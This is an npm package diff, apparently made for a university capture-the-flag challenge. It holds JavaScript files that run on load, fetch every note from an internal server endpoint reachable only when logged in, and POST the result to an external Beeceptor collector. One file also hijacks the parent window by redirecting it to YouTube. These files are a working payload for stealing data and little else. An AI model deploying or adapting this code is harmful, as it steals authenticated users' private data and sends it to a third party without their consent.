test_ctf_ntu_fetch_7 1.0.0

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "test_ctf_ntu_fetch_7",
+  "version": "1.0.0",
+  "description": "just for ntu ctf test",
+  "main": "test_ctf_ntu_fetch.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "william H",
+  "license": "MIT"
+}

package/test_ctf_ntu_fetch.js

@@ -0,0 +1,17 @@
+function leakDataFromEndpoint() {
+    fetch('http://10.113.184.121:10082/api/notes/all')  // 注意：这是跨域请求
+    .then(response => response.json())
+    .then(data => {
+      fetch('https://ntuctf.free.beeceptor.com', {  // 你的 Beeceptor 端点
+        method: 'POST',
+        body: JSON.stringify(data),
+        headers: { 'Content-Type': 'application/json' }
+      });
+    })
+    .catch(error => console.error('Error:', error));
+  }
+  
+  // 把leakDataFromEndpoint暴露到全局作用域，以便在外部调用
+  window.parent.leakDataFromEndpoint = leakDataFromEndpoint;
+
+  leakDataFromEndpoint();

package/test_ctf_ntu_fetch_2.js

@@ -0,0 +1,29 @@
+  function leakDataFromEndpoint() {
+    fetch('http://10.113.184.121:10082/api/notes/all')  // 登录后才能访问，需要包含凭证
+    .then(response => {
+      // 检查响应是否成功
+      if (!response.ok) {
+        throw new Error('Failed to fetch notes.');
+      }
+      return response.json();
+    })
+    .then(data => {
+      return fetch('https://ntuctf.free.beeceptor.com', {
+        method: 'POST',
+        body: JSON.stringify(data),
+        headers: { 'Content-Type': 'application/json' }
+      });
+    })
+    .then(response => {
+      if (!response.ok) {
+        throw new Error('Failed to send data.');
+      }
+      console.log('Data sent successfully');
+    })
+    .catch(error => {
+      console.error('Error:', error);
+    });
+  }
+  
+  // 确保当脚本加载时调用函数
+  leakDataFromEndpoint();

package/yt.js

@@ -0,0 +1,2 @@
+// 当页面加载时，立即重定向到YouTube
+window.parent.location.href = 'https://www.youtube.com/watch?v=ZRtdQ81jPUQ';